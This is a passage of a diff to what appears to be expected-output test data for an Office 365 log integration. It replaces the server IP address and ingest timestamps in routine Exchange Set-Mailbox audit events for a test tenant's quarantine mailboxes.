Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853203900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3695,12 +3695,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3743,7 +3743,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3755,8 +3755,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177697900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853210Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3776,12 +3776,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3824,7 +3824,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3836,8 +3836,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177700500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853215800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3857,12 +3857,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3905,7 +3905,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3917,8 +3917,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177703600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853221900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3938,12 +3938,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3986,7 +3986,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3998,8 +3998,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177706400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853227700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4019,12 +4019,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4067,7 +4067,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4079,8 +4079,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177709800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853233400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 